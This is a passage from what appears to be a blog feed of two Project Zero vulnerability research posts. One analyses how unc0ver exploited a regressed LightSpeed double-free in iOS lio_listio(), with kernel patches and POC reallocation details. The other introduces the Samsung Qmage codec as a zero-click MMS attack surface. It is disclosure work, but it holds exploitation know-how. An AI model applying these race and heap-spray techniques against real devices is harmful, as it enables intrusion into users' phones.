  lr: 0xfffffff0075f10d0  # _unix_syscall
  lr: 0xfffffff00723468c  # _sleh_synchronous
  lr: 0xfffffff0070f9610  # _fleh_synchronous
  lr: 0x00000001bf085ae4

The call to lio_listio() immediately stood out to me. Not long before I had finished writing a survey of recent iOS kernel exploits, and I happened to remember that lio_listio() was the vulnerable syscall used in the LightSpeed-based exploits. I reread the blog post from Synacktiv to get a sense of the bug and immediately another piece fell into place: the target object that is double-freed in the LightSpeed race is an aio_lio_context object that lives in kalloc.16. Also, the large number of threads in the unc0ver app further supported the idea of a race condition.

At this point I felt I had enough evidence to reach out to Apple with a preliminary analysis suggesting that the bug was LightSpeed, either a variant or a regression. 

Confirmation and POC

Next I wanted to confirm the bug by writing a POC to trigger the issue. I tried the original POC shown in the LightSpeed blog post, but after a minute of running it hadn't yet panicked. This suggested to me that perhaps the 0-day was a variant of the original LightSpeed bug.

To find out more, I started two lines of investigation: looking at the XNU sources to try and spot the bug, and using checkra1n/pongoOS to patch lio_listio() in the kernelcache and then running the exploit. From the sources I couldn't see how the original vulnerability was fixed at all, which didn't make sense to me. So instead I focused my effort on kernel patching.

Booting a patched kernelcache is tricky but doable because of checkm8. I downloaded checkra1n and booted the iPod into the pongoOS shell. Using the example from the pongoOS repo as a guide, I created a loadable pongo module that would disable the checkra1n kernel patches and instead apply my own patches. (I disabled the checkra1n kernel patches because I was worried that unc0ver would detect checkra1n and engage anti-analysis measures.)

My first test was just to insert invalid instruction opcodes into the lio_listio() function so that it would panic if called. Surprisingly, the device booted just fine, and then once I clicked "Jailbreak" it panicked. This meant that unc0ver was the only process calling lio_listio().

I next patched the code responsible for allocating the aio_lio_context object that is double-freed in the original LightSpeed bug so that it would be allocated from kalloc.48 instead of kalloc.16:

FFFFFFF0074D5D54     MOV     W8, #0xC ; patched to #0x23
FFFFFFF0074D5D58     STR     X8, [SP,#0x40] ; alloc size
FFFFFFF0074D5D5C     ADRL    X2, _lio_listio.site.5
FFFFFFF0074D5D64     ADD     X0, SP, #0x40
FFFFFFF0074D5D68     MOV     W1, #1 ; can block
FFFFFFF0074D5D6C     BL      kalloc_canblock
FFFFFFF0074D5D70     CBZ     X0, loc_FFFFFFF0074D6234
FFFFFFF0074D5D74     MOV     X19, X0 ; lio_context
FFFFFFF0074D5D78     MOV     W1, #0xC ; size_t
FFFFFFF0074D5D7C     BL      _bzero

The idea is that increasing the object's allocation size will cause unc0ver's exploit strategy to fail because it will try to replace the accidentally-freed kalloc.48 context object with a replacement object from kalloc.16, which simply cannot occur. And sure enough, with this patch in place, unc0ver stalled at the "Exploiting kernel" step without actually panicking.

I then ran a few more experiments patching various points in the function to dump the arguments and data buffers passed to lio_listio() so that I could compare against the values used in the original LightSpeed POC. The idea was that if I noticed any substantial differences, that would point me in the direction of the variant in the source. However, other than the field aio_reqprio being set to 'gang', there were no differences between the arguments passed to lio_listio() by unc0ver and those in the original POC.

At this point it looked like the 0-day might actually be the original LightSpeed bug itself, not a variant, so I returned to the original POC to see if perhaps the reason it wasn't triggering was that a specific technique used had been mitigated. The code responsible for reallocating the kalloc.16 allocation caught my eye:

/* not mandatory but used to make the race more likely */
/* this poll() will force a kalloc16 of a struct poll_continue_args */
/* with its second dword as 0 (to collide with lio_context->io_issued == 0) */
/* this technique is quite slow (1ms waiting time) and better ways to do so exists */
int n = poll(NULL, 0, 1);

I hadn't ever seen poll() used as a reallocation primitive before. Intuitively it felt like using Mach port based reallocation strategies was more promising, so I replaced this code with an out-of-line Mach ports spray copied from oob_timestamp. Sure enough, that was the only change required to make the POC trigger reliably in a few seconds.

Patch history

After I had a working POC, I retried the original LightSpeed POC and found that it would eventually panic if left to run for long enough. Thus, this is another case of a reintroduced bug that could have been identified by simple regression tests.

So, let's return to the sources to see if we can figure out what happened. As mentioned earlier, when I first checked the XNU sources to see how the lio_listio() patch might have been broken, I actually couldn't identify how the bug was originally patched at all. In retrospect, this isn't all that far off.

The original LightSpeed blog post describes the vulnerability very well, so I won't rehash it all here; I highly recommend reading that post. From a high level, the bug is that the semantics of which function frees the aio_lio_context object are unclear, as both the worker threads that perform the asynchronous I/O and the lio_listio() function itself could do it.

As mentioned in the post, the original fix for this bug was just to not free the aio_lio_context object in the cases in which it might be double-freed:

On the one hand, this patch fixes the potential UaF on the lio_context. But on the other hand, the error case that was handled before the fix is now ignored... As a result it is possible to make lio_listio() allocate an aio_lio_context that will never be freed by the kernel. This gives us a silly DoS that will also crash the recent kernels (iOS 12 included).
[...]
For the rest, we will see in the future if Apple bothers to fix the little DoS they introduced with the patch :D

It turns out that Apple did eventually decide to fix the memory leak in iOS 13... but in doing so it appears they reintroduced the race condition double-free:

    case LIO_NOWAIT:
+       /* If no IOs were issued must free it (rdar://problem/45717887) */
+       if (lio_context->io_issued == 0) {
+           free_context = TRUE;
+       }
        break;

The code in iOS 13 isn't exactly the same as iOS 11, but it's semantically equivalent. Anyone who had remembered and understood the original LightSpeed bug could have easily identified this as a regression by reviewing XNU source diffs. And anyone who ran relatively simple regression tests would have found this issue trivially.

So, to summarize: the LightSpeed bug was fixed in iOS 12 with a patch that didn't address the root cause and instead just turned the race condition double-free into a memory leak. Then, in iOS 13, this memory leak was identified as a bug and "fixed" by reintroducing the original bug, again without addressing the root cause of the issue. And this security regression could have been found trivially by running the original POC from the blog post.

You can read more about this regression in a followup post on the Synacktiv blog.

Conclusion

The combination of the SockPuppet regression in iOS 12.4 and the LightSpeed regression in iOS 13 strongly suggests that Apple did not run effective regression tests on at least these old security bugs (and these were very public bugs that got a lot of attention). Running effective regression tests is a necessity for basic software testing, and a common starting point for exploitation.

Still, I'm very happy that Apple patched this issue in a timely manner once the exploit became public. The reality here is that attackers figure out these issues very quickly, long before the public POC is released. Thus the window of opportunity to exploit regressions is substantial.

Also, my goal in trying to identify the bug used by unc0ver was to demonstrate that obfuscation does not block attackers from quickly weaponizing the exploited vulnerability. It turned out that I was lucky in my analysis: my experience writing kernel exploits let me quickly figure out an alternative strategy to find the bug, and I happened to already be familiar with the specific vulnerability used because I've been keeping track of past exploits. But anyone in the business of using exploits against Apple users would also have these same advantages.

MMS Exploit Part 1: Introduction to the Samsung Qmage Codec and Remote Attack Surface

16 July 2020 at 16:42
By: Tim
Posted by Mateusz Jurczyk, Project Zero

This post is the first of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published as they are completed and will be linked here when complete.

Introduction

In January 2020, I reported a large volume of crashes in a custom Samsung codec called "Qmage", present in all Samsung phones since late 2014 (Android version 4.4.4+). This codec is written in C/C++ code, and is baked deeply into the Skia graphics library, which is in turn the underlying engine used for nearly all graphics operations in the Android OS. In other words, in addition to the well-known formats such as JPEG and PNG, modern Samsung phones also natively support a proprietary Qmage format, typically denoted by the .qmg file extension. It is automatically enabled for all apps which display images, making it a prime target for remote attacks, as sending pictures is the core functionality of some of the most popular mobile apps.

In May 2020, Samsung released patches addressing the crashes (including a number of buffer overflows and other memory corruption issues) for devices that are eligible for receiving security updates. The issues were collectively assigned CVE-2020-8899 and a Samsung-specific SVE-2020-16747. On the day of the security bulletin being released, I derestricted the relevant #2002 tracker entry, and open-sourced my fuzzing harness on GitHub (SkCodecFuzzer). I recommend reading the original report, as it includes a detailed explanation of the then-current state of the codec, my approach to fuzzing it, and the bugs found as a result. It may provide some valuable context to better understand this and other upcoming blog posts in the series, although I will do my best to make them self-contained and easy to understand on their own.

After reporting the bugs, I spent the next few months trying to build a zero-click MMS exploit for one of the flagship phones: Samsung Galaxy Note 10+ running Android 10. For reference, similar attacks against chat apps were shown to be possible on iPhones via iMessage by Samuel Groß and Natalie Silvanovich of Google Project Zero in 2019 (see demo video, and blog posts #1, #2, #3). On the other hand, to my knowledge, no exploitation attempts of this kind have been publicly documented against Android since the Stagefright vulnerabilities disclosed in 2015. To me, this seemed like a great opportunity to deep dive into the state of the exploit mitigations on Android today, and see how they fared against a relatively powerful bug – a heap-based buffer overflow with controlled buffer size, data length and the data itself. In the end, I managed to develop an exploit which remotely bypassed ASLR and obtained a reverse shell on a victim's phone (with the privileges of the SMS/MMS app) with no user interaction required, in around 100 minutes on average. The official recording of an attack demonstration is available here, and below I am presenting a director's cut of the same video, with a soundtrack added for your viewing pleasure. :)


By publishing this and further blog posts in the Qmage series, I am hoping to shed more light on how I found the codec, what I learned about it during reconnaissance and preparation for fuzzing, and finally how I managed to circumvent various Android mitigations and obstacles along the way to write a reliable MMS exploit. Please join me on this ride!

How it started

As is often the case in vulnerability research (in my experience), there was a bit of luck involved in the finding of this attack surface. In late 2019, Project Zero had a hackathon as part of a team bonding activity, with focus on Samsung phones. We chose Samsung phones as they were the most popular mobile devices in Europe in Q2 2019, when we were planning our event. Other results of that event can also be found in the PZ bug tracker – they were centered mostly around the security of Samsung kernel-mode components, and fixed in February 2020. During the hackathon, we used Samsung Galaxy A50 running Android 9 as our test devices, but the rest of this post is written based on the analysis of a newer Note 10+ and Android 10, which were the latest Samsung flagship devices at the time of this research.

When I was looking for potential bug hunting targets (naturally written in native languages, so that memory corruption issues would apply), my first thought was to look for inspiration in the bug tracker and existing reports from the past. There, the following issues reported by Natalie in 2015 immediately caught my eye:

Samsung Galaxy S6 image processing bugs in Project Zero bug tracker

Memory safety issues in image handling, how splendid! Please note the "Q" in the "libQjpeg" library name in some of the titles – without knowing it, this was my first encounter with the third-party Quramsoft software vendor. I dug into the bug descriptions, but I couldn't find any of the mentioned libSecMMCodec.so, libQjpeg.so or libfacerecognition.so modules on the test device. However, when I searched for some function names extracted from these reports, such as QURAMWINK_DecodeJPEG, I found them in three other files under /system/lib64:

  • libimagecodec.quram.so
  • libatomcore.quram.so
  • libagifencoder.quram.so

If you're wondering how many more libraries with "quram" in their names there are in the directory, there are three more on the Note 10+:

  • libSEF.quram.so
  • libsecjpegquram.so
  • libatomjpeg.quram.so

In general, the various Quram libraries used in a specific Samsung Android build are listed in /system/etc/public.libraries-quram.txt. I think it is worth highlighting that Quramsoft has a portfolio of software solutions related to audio, video, images and animations, both for encoding and decoding. Throughout Android's existence (and even before it), Samsung has worked closely with the third-party vendor and included a number of their libraries in their custom builds of the OS, mostly to support and advance built-in apps such as Camera or Gallery. Over the years, these libraries have been evolving, some of them were renamed and removed, while others were refactored and merged, up to the point where it is objectively hard for a member of the public to keep track which Samsung models have what subset of the libraries installed. However, many of them are still present and are used on the latest phones. I hope this helps clear up any confusion as to why I am referencing Quram libraries outside the context of just the Qmage codec.

Back to the story – after a brief analysis, I narrowed my interest down to the libimagecodec.quram.so library, which was the largest, most imported one, and seemed to implement support for a variety of image formats. I could easily trigger it through Gallery, but I still struggled to reach it through media scanning, something that Natalie used as the attack vector in many of her bugs. I began to investigate how the media scanner worked, starting with platform/frameworks/base/media/java/android/media/MediaScanner.java in AOSP, and specifically the scanSingleFiledoScanFileprocessImageFile path. Here, we can see that all it really boils down to is the usage of the standard BitmapFactory interface:

private boolean processImageFile(String path) {
    try {
        mBitmapOptions.outWidth = 0;
        mBitmapOptions.outHeight = 0;
        BitmapFactory.decodeFile(path, mBitmapOptions);
        mWidth = mBitmapOptions.outWidth;
        mHeight = mBitmapOptions.outHeight;
        return mWidth > 0 && mHeight > 0;
    } catch (Throwable th) {
        // ignore;
    }
    return false;
}

I later verified that very similar code was used by the MediaScanner service on my test Samsung device; the only difference being extra references to an com.samsung.android.media.SemExtendedFormat interface and a related libSEF.quram.so library, which appeared irrelevant to my goal of triggering Quram's custom JPEG decoder.

Discovering Skia and Qmage

Not being very familiar with Android and its graphics subsystem at the time, I wanted to dig even deeper into the stack of abstraction and see the actual image decoding code. To achieve that, I followed the execution path of a few more nested methods, first in Java and then crossing into C++ land: BitmapFactory.decodeFiledecodeStreamdecodeStreamInternalnativeDecodeStreamdoDecode. In here, we can finally see the actual logic of decoding an image from a byte stream, first by creating a Skia SkCodec object:

    // Create the codec.
    NinePatchPeeker peeker;
    std::unique_ptr<SkAndroidCodec> codec;
    {
        SkCodec::Result result;
        std::unique_ptr<SkCodec> c = SkCodec::MakeFromStream(std::move(stream), &result, &peeker);

        [...]

        codec = SkAndroidCodec::MakeFromCodec(std::move(c));
        if (!codec) {
            return nullObjectReturn("SkAndroidCodec::MakeFromCodec returned null");
        }

… and then calling the getAndroidPixels method on it:

    SkCodec::Result result = codec->getAndroidPixels(decodeInfo, decodingBitmap.getPixels(),
            decodingBitmap.rowBytes(), &codecOptions);

So, in order to learn what image formats are supported by the interface, we have to look into SkCodec::MakeFromStream. The upstream version of the method can be found on GitHub; there, we can see that depending on macros defined during compilation, the following types of images can be loaded (based mostly on the gDecoderProcs table):

  • png
  • jpeg
  • webp
  • gif
  • ico
  • bmp
  • wbmp
  • heif
  • raw (dng)

This is already a sizable list of formats. We can compare the open-source implementation with the compiled one found on Samsung phones in /system/lib64/libhwui.so, which is where the Skia code lives on Android now (on older systems, it was located in /system/lib64/libskia.so). When I originally opened the SkCodec::MakeFromStream method in IDA Pro, I saw an unrolled loop iterating over the standard Skia codecs, but also a few extra file signature checks, namely:

if ( png_sig_cmp(header, 0LL, length) && (!length || *(_DWORD *)header != 'OIP\x89') )
{
  if ( header[0] == 'Q' && header[1] == 'G' )
  {
    if ( QuramQmageDecVersionCheck(header) )
    {
      // ...
    }
    __android_log_print(6LL, "Qmage", "%s : stream is not a Qmage file\n", "IsQmg");
  }
  if ( header[0] == 'Q' && header[1] == 'M' )
  {
    if ( QuramQmageDecVersionCheck_Rev8253_140615(header) )
    {
      // ...
    }
    __android_log_print(6LL, "Qmage", "%s : stream_Rev8253_140615 is not a Qmage file\n", "IsQM");
  }
  else if ( *(_DWORD *)header == 0x5CA1AB13 )
  {
    // ...
  }

There were four additional signatures being checked for:

  1. \x89PIO, an alternative to the standard \x89PNG file magic.
  2. QG, a type of a Qmage file, as indicated by the log string.
  3. QM, another type of a Qmage file.
  4. \x13\xAB\xA1\x5C, magic bytes which represent an Adaptive Scalable Texture Compression (ASTC) image.

After brief analysis, I concluded that PIO and ASTC were not particularly interesting from a security research perspective, and I turned my eyes to Qmage. It looked like the obvious choice, considering that libhwui.so had hundreds of functions containing "quram", "qmage", or other related strings, these routines performed low-level file format parsing, and many of them were extremely long. The codec seemed so complex and so deeply integrated in Android that it got me really intrigued. An additional factor in all this was that I had never heard about it before, and even using Google search wasn't of much help either. In offensive security, this is usually a very strong indicator of an attractive research target, so I had no choice – I had to put my detective cap on and investigate further.

Learning more about the codec

At this stage, I had many questions roaming in my head, and hardly any answers:

  • What is this codec? How does it work?
  • What is the history behind it? How long has it been shipping? Is it present in all Samsung phones?
  • What is its intended use, and where to find samples to start playing with?
  • What is the security posture of the code?

Finding the answers took me many weeks, but for the sake of brevity, I will present an accelerated account of the events, which skips over some periods of confusion and attempts to make sense of the partial information available at the time. :)

Format versioning

So far, we know that there are two possible magic values for Qmage files: QM and QG. If we look deeper into QuramQmageDecVersionCheckQmageDecCommon_VersionCheck, which is the second part of the header check, we will see the following logic (in C-like pseudocode):

int QmageDecCommon_VersionCheck(unsigned __int8 *data) {

  if ((data[0] | (data[1] << 8)) != 'GQ') {
    debug_QmageDecError = -5;
    return 0;
  }

  if (data[2] > 2 || (data[2] == 2 && data[3] != 0)) {
    debug_QmageDecError = -5;
    return 0;
  }

  return 1;
}

The function verifies the QG signature again, and then treats the next two bytes as the version identifier. If we assume that data[2] and data[3] are major and minor version numbers respectively, then according to the code above, versions 2.0 are supported. In fact, this is a really permissive way of implementing the check, because it allows through a number of versions that don't really exist. At the time of this writing, I already know that there are three actual valid versions of the QG format:

  • QG 1.0
  • QG 1.1
  • QG 2.0

Other combinations of major/minor versions (such as 1.231) are either ignored by the codec, or resolve to one of the three above.

To learn more about the versioning of QM images, we can similarly follow the QuramQmageDecVersionCheck_Rev8253_140615 QmageDecCommon_VersionCheck_Rev8253_140615 functions in our disassembler, which will lead us to the following logic:

int QmageDecCommon_VersionCheck_Rev8253_140615(unsigned __int8 *data) {

  if (*(unsigned short *)&data[0] == 'MI') {
    if ( data[7] - 90 < 4 )
      return 1;
  }
  else if (*(unsigned short *)&data[0] == 'TI' ) {
    if ((data[5] & 0x7F) == 21)
      return 1;
  }
  else if (*(unsigned int *)&data[0] == 'GEFI') {
    if ((data[11] & 0x7F) == 21)
      return 1;
  }
  else if (*(unsigned short *)&data[0] == 'WQ') {
    if (data[2] > 0xC)
      return 1;
  }
  else if (*(unsigned int *)&data[0] == '`RFP') {
    if (*(unsigned int*)&data[4] == 0)
      return 1;
  }
  else if (*(unsigned short *)&data[0] == 'MQ' && data[2] == 1) {
    return 1;
  }

  debug_QmageDecError = -5;
  return 0;
}

This is definitely more code than expected. We are primarily interested in the last if statement, where we can see that a 0x01 byte is expected to follow the QM magic. Again assuming that this is the version number, we can note down that a version 1 of the QM format is supported by the modern Samsung build of Skia. However, there are also a number of other signatures being checked for: IM, IT, IFEG, QW and PFR. I don't know exactly what formats they represent, and since the above routine can only be reached through a QM header detected in SkCodec::MakeFromStream, the signatures don't really seem to be intentional there. More likely, they are leftover artifacts manifesting file formats parsed by Quramsoft code elsewhere, or got deprecated and aren't in active use anymore at all. We might see these constants again in the future so it's worth keeping them in mind.

In summary, there are four distinct versions of Qmage supported by Skia, in chronological order: QMv1, QG1.0, QG1.1, QG2.0. This is especially self-evident when looking at the list of debug symbols found in libhwui.so. For each symbol that has existed in the QMv1 codec all the way to QG2.0, there are now four copies of the given variable/function/etc., for example:

Example list of Qmage functions with four copies each

The names without any suffixes represent parts of the code for the latest format (QG 2.0). For each earlier format, there seems to be a fork of the code with all functions, structures, static objects etc. renamed to include a revision number and a second numeric part which looks like a date. If my understanding is correct, that would mean that the cut-off dates for the QMv1, QG1.0 and QG1.1 versions of the format were around June 2014, Oct 2014 and Feb 2015 – a relatively short period of time. The QG2.0 iteration was first seen in January 2020 in Android 10, but being the most recent, it lacks the convenient _RevXXXX_YYMMDD suffix to tell us exactly which revision number it is.

However, there are also other bits and pieces of information regarding the versioning of the codec itself to be found in the precompiled Skia binaries. For example, there is an empty function called QmageDecCommon_QmageVersion_1_11_00 in the current build of libhwui.so. Furthermore, there is also an unused QuramQmageGetDecoderVersion function in the library, which prints out some other kind of four-part version number, and the exact build date and time, for example:

void QuramQmageGetDecoderVersion() {
  __android_log_print(ANDROID_LOG_INFO, "QG", "Quram Qmage Decoder Info\n");
  __android_log_print(ANDROID_LOG_INFO, "QG", "Version\t : %d.%d.%d.%d\n", 2, 0, 4, 21541);
  __android_log_print(ANDROID_LOG_INFO, "QG", "Build Date\t : %s %s\n", "Mar 17 2020", "19:18:14");
}

If the version number is represented by four X.Y.Z.R integers, then the X.Y pair denotes the highest version of the QG format that the codec supports (in this case, QG2.0), and R is the revision number of the code. By studying the countless builds of libskia.so and libhwui.so found in archival Samsung firmwares released over the years, one could create a very accurate record of all the different Qmage compilations ever shipped with Samsung devices. My limited analysis has resulted in the following, undoubtedly incomplete table:

Build Date
Build Time
X
Y
Z
R
Jun 15 2014
QMv1 codec
8253
Nov 14 2014
20:12:03
1
0
0
10484
Nov 17 2014
16:25:19
1
0
0
10484
Jun 12 2015
19:23:03
1
1
1
14470
Jul 3 2015
20:40:49
1
1
1
14470
Jul 6 2015
11:52:27
1
1
1
14470
Sep 2 2015
16:27:42
1
1
1
14470
Nov 27 2015
20:39:10
1
1
1
14470
Dec 21 2015
18:29:31
1
1
2
14470
May 27 2016
15:57:00
1
1
4
21541
Sep 8 2016
17:42:29
1
1
4
21541
Nov 8 2017
20:52:16
1
1
4
21541
Jan 11 2018
20:31:15
1
1
4
21541
Sep 26 2019
17:06:36
2
0
4
21541
Feb 28 2020
09:26:32
2
0
4
21541
Mar 17 2020
19:18:14
2
0
4
21541
May 28 2020
08:53:20
2
0
4
21541

Based on the above information, we can confirm some of our existing presumptions, and draw new conclusions:

  • The codec's appearance in Skia goes back to around mid-2014.
  • It saw the most activity in development between 2014 and 2016, followed by a few years of relative inactivity, to come back again with a new version 2.0 of the format, first compiled for production use in September 2019.
  • The Z component of the version (4) and the revision number (21541) haven't changed since 2016, limiting our insight into the volume of recent changes in the code base.

For those like me who are interested in small interesting pieces of metadata, there are even more artifacts to be found in the library. For example, there are three copies of the QuramQmageGetDecoderVersion function in libhwui.so on Samsung Android 10 (for each version of the QG format), and there are both 32-bit and 64-bit builds of the shared object in the system, so for one compilation of the Qmage codecs, we get six different timestamps taken during the process. On the example of the build from 26 September 2019:

Version
Bitness
Build timestamp
2.0
32-bit
17:05:08
1.1
32-bit
17:06:16
1.0
32-bit
17:06:17
2.0
64-bit
17:06:36
1.1
64-bit
17:07:45
1.0
64-bit
17:07:46

I don't think there is any information that can be derived from it with full certainty, but I still find it fascinating enough to include here. At the very least, the 2m36s gap between the first and last timestamp gives us a clue as to the extent of complexity of the codec.

Codec size, basic control flow and compression types

When we open up libhwui.so in IDA Pro and start inspecting the Qmage code in compiled form, the above build times may start to make sense. In the few builds of the library that I've tested, the Qmage-related code is placed in one continuous binary blob, which makes it easy to measure its size. For example, in the 26-Sep-2019 build (2.0.4.21541), the first function in the Qmage-related chunk is QmageDecoderLicenseCheck, and the last one is SetResidualCoeffs_C. The overall code region between them is almost 908 kB in size (!), or around 15% of the overall executable segment in the shared object. In large part, this is due to the QG2.0 codec added in Android 10, which introduces more code duplication (new forks of most Qmage-related functions) and imports a whole new copy of libwebp. But even on Android 9 and the 8-Nov-2017 build, the codec is ~425 kB long.

Below is a list of the 20 longest functions found in libhwui.so. Notice how 18/20 of them are related to Qmage:

Top 20 longest functions in libhwui.so

Let's now move onto the control flow and entry points of the codec. When a Qmage image is loaded through an Android interface such as BitmapFactory, execution ends up in the doDecode function, which then calls SkCodec::MakeFromStream, as discussed above. Then, if the first few bytes match the "QG" signature, execution reaches SkQmgCodec::MakeFromStream and further nested functions for header parsing:

SkQmgCodec::MakeFromStream
└── ParseHeader
    └── QuramQmageDecParseHeader
        ├── QmageDecCommon_ParseHeader
        │   └── QmageDecCommon_QGetDecoderInfo
        └── QmageDecCommon_MakeColorTableExtendIndex

The flow is very similar for the older QMv1 files. This basic parsing is sufficient to extract essential information about the bitmap such as its dimensions, so if the inJustDecodeBounds flag is set in BitmapFactory.Options, the processing of the file ends here. However, even though the header parsing logic is short and simple compared to the full bitmap decoding, I still managed to find memory corruption issues there related to building the color table in memory. So, even processes that only query the bounds of untrusted images, such as the MediaScanner service, were prone to attacks via Qmage. But let's not get ahead of ourselves. If the full bitmap data is requested by the caller (e.g. for an app to display it), execution proceeds to SkQmgCodec::onGetPixels and deeper down:

SkQmgCodec::onGetPixels
└── QuramQmageDecodeFrame
    └── Qmage_WDecodeFrame_Low
        └── _QM_WCodec_decode
            ├── PVcodecDecoderIndex
            ├── PVcodecDecoderGrayScale
            └── PVcodecDecoder

Up until this point, the consecutive functions are mostly simple wrappers over the next nested routines, without much data processing logic involved. This changes with the PVcodecDecoder[...] family, which finally choose the relevant low-level codec and call one of the corresponding long, complex functions which do the heavy lifting, such as PVcodecDecoder_1channel_32bits_NEW or QuramQumageDecoder32bit24bit. The subset of available compression types varies between different versions of Qmage; I have performed a cursory analysis and documented them in the table below. Some of them implement well-known concepts such as Run-Length Encoding (RLE) or zlib inflation, while others (the most complex ones) seem to execute custom, proprietary decompression algorithms.


QMv1
QG1.0
QG1.1
QG2.0
PVcodecDecoder_1channel_16bits_NEW
PVcodecDecoder_1channel_32bits_NEW
PVcodecDecoder_GrayScale_16bits_NEW
PVcodecDecoder_zip
QmageDiffZipDecode
PVcodecDecoder_24bits_NEW
PVcodecDecoder_32bits_NEW
QuramQumageDecoder32bit24bit
QmageRunLengthDecodeCheckBuffer
QuramQumageDecoder8bit
QuramQmageGrayIndexRleDecode

It's worth noting that even as some of these compression types are no longer found in the most recent version of the codec, they are still present and reachable through the older versions supported on Samsung devices. A minor exception is the QMv1 format, which sometimes fails to load in Skia in certain contexts, probably due to its obsolescence and lack of proper testing on modern devices.

It's also interesting that at this level of abstraction, the QG2.0 format doesn't introduce any new codecs of its own. That doesn't mean that it's only a minor revision compared to QG1.1 – on the contrary, it does bring in a vast amount of new functions, just at a different level of the call hierarchy:

[...]
├── QuramQumageDecoder32bit24bit
│   ├── DecodePrediction2dZip
│   ├── DecodePrediction2dZip_1L
│   └── QmageDecodeStreamGet_GMH
├── QmageDiffZipDecode
│   └── QmageSubUnCompress
│       └── qme_uncompress
│           └── qme_inflateInit
│           └── qme_inflate
│           └── qme_inflateEnd
└── PVcodecDecoder_zip
    ├── Qmage7zUnCompress
    ├── QmageBinUnCompress
    └── Vp8XxD_QMG
        ├── VP8LNew_QMG
        ├── WebPResetDecParams_QMG
        ├── VP8InitIoInternal_QMG
        ├── VP8LDecodeHeader_QMG
        └── XxDecodeImageData__QMG

Instead of adding new compression types, the QG2.0 format seems to build on and improve the existing ones. It also imports the zlib 1.2.8 library, with each of its functions prepended with the qme_ prefix, and a whole second copy of libwebp (one is already used by Skia), with all of its symbols appended with a _QMG suffix. One could presume that the addition of libwebp indicates some kind of webp-in-qmage "inception" feature, but based on the fact that a great majority of the library is never referenced, it's more likely that Qmage simply borrows a few functions from libwebp, but just happens to link in the whole library. It was one of many unorthodox development practices that had been apparent in the codec so far.

I hope this sheds some light on the structure of the code and the versioning of .qmg files. With some basic knowledge of the inner workings of the format, we can now look for some actual examples of such images to play and experiment with.

Finding input samples

Based on the available information, we can presume that the Qmage format was not introduced in Skia for user-generated content, but rather for static resources in Samsung-manufactured APKs (built-in apps and themes). This is where we can look for an initial set of test cases for fuzzing and manual experimentation. However, please note that throughout the years, APK resources in Samsung firmwares have shipped in a variety of formats and file extensions:

  • Qmage (.qmg, .qio)
  • ASTC (.astc, .atc)
  • PNG (.png, .pio)
  • BMP (.bmp)
  • JPEG (.jpeg)
  • SVG (.svg)
  • webp (.webp)
  • SPR (.spr)
  • Binary XML (.xml)

It is not clear to me how the device model, Android version, year of release, country code or other characteristics of a specific Samsung firmware are factored in in the determination of which format to use for a given resource in a given app. Sometimes all bitmaps were encoded in a single format (e.g. PNG, Qmage, ASTC), and in other cases up to six different formats were used in the scope of one APK. This is still largely a mystery to me. However, I can say for sure that I have had the most luck finding .qmg files in the firmware of Android 4.4.4, 5.0.1, 5.1.1 and 6.0.1 for Samsung Galaxy Note 3, 4 and 5 released in 2014-2016. That said, please note that this is just an example and a variety of other firmwares also include Qmage samples.

As mentioned in the bug tracker entry, I have been able to identify legitimate QMv1, QG1.0 and QG1.1 samples during my research. While the codec for QG2.0 is present in Skia on Android 10, I haven't encountered any genuine bitmaps encoded in this new format thus far, despite spending a little bit of time looking for them. Consequently, in order to achieve a satisfying degree of code coverage of the QG2.0 codec, I had to synthesize such files through the fuzzing of existing QG1.x test cases that I had at my disposal. I'll go into this in more detail in the next blog post.

To obtain some actual files to look at, let's examine the firmware of Samsung Galaxy Note 4, Android 6.0.1, for Switzerland, built on 3 May 2016 (fun fact: about half of Project Zero is based in Switzerland). Once we have access to the system partition, we can dig into the default apps stored in /system/app and /system/priv-app. My go-to app to look for Qmage samples is /system/priv-app/SecSettings/SecSettings.apk. An APK is essentially a ZIP archive, so we can extract it, open it in our favorite file manager and browse to the res/ subdirectory. In there, we'll see:

Structure of the "res" APK directory

We are interested in the drawable subdirectories, for example drawable-xxxhdpi-v4:

Bitmap resources found in the "drawable-xxxhdpi-v4" subdirectory

There they are, actual embedded Qmage files! They are noticeably mixed with some .pio (png) images, as well as a few other formats (webp, xml, jpeg, spr) not shown in the screenshot. Let's take the accessibility_light_easy_off.qmg file out for testing. In a hex editor, we can see that it's in fact a QG1.1 file (see first four bytes):

Hex dump of an example Qmage file header

The basic header of Qmage files is 12 bytes long and has the following structure:

Magic
Version
Flags
Qual.
Width
Height
Extra
'Q'
'G'
0x01
0x01
0x01
0x28
0x5B
0x58
0x01
0x58
0x01
0x00
Interpreted as:
QG
1.1.1
0x28
91
344
344
0

So in this example, we are dealing with a lossy (quality 91/100) bitmap with 344x344 dimensions. Let's try to get it loaded on a real device to see if it's displayed correctly. To achieve that, it is important to give the file a standard image extension such as .png or .jpg, since .qmg files are not recognized as images by default. Once we change the extension and copy the file to a Samsung phone, we can view it in Gallery or any other app which displays bitmaps:

Qmage file displayed in the Gallery app

It works! What happens if we send the Qmage image via MMS?

Qmage file sent over MMS and displayed by the Messages app

Success again. This confirms that Qmage files are indeed seamlessly supported on Samsung devices the same way other standard formats are, which makes them an equally important attack surface. We can now fire up a debugger, attach it, for example, to the Gallery process (com.sec.android.gallery3d), set a breakpoint on one of the codec entry points and follow the execution flow to better understand how it works. We can also start manually flipping bits to see how resistant the codec is against corrupted input, or collect the samples in preparation for an automated fuzzing session. With a number of valid Qmage-encoded files to play with, our testing capabilities are suddenly greatly extended. Before we get to that, though, let's see if we can find any more debug symbols or other publicly available metadata, which might prove useful in future bug root cause analysis or exploit development.

Finding traces of open-source code

In the early stages of exploring old or obscure technologies, I like to refer to GitHub as a source of information. It can help identify open-source code related to the subject in question, otherwise not indexed by web search engines and hard to find by the usual means. This worked well here as well – when I typed "qmage" into the search box, I got a number of interesting hits. Perhaps the most helpful one revealed that Samsung used to open-source its custom Skia modifications, including a wrapper class for Qmage. To access it through the official channels, you can go to https://opensource.samsung.com/, navigate to RELEASE CENTER → Mobile, and look for packages with names containing "_LL_", and with over 1.0 GB in size (for example GT-I9505_EUR_LL_Opensource.zip). The two letters most likely signify the Android version, i.e. LL for Android Lollipop (version 5.x).

Code snippet of the SkQmageImageDecoder::onDecode method

The relevant file in the bundle is Platform.tar.gz/vendor/samsung/packages/apps/SBrowser/
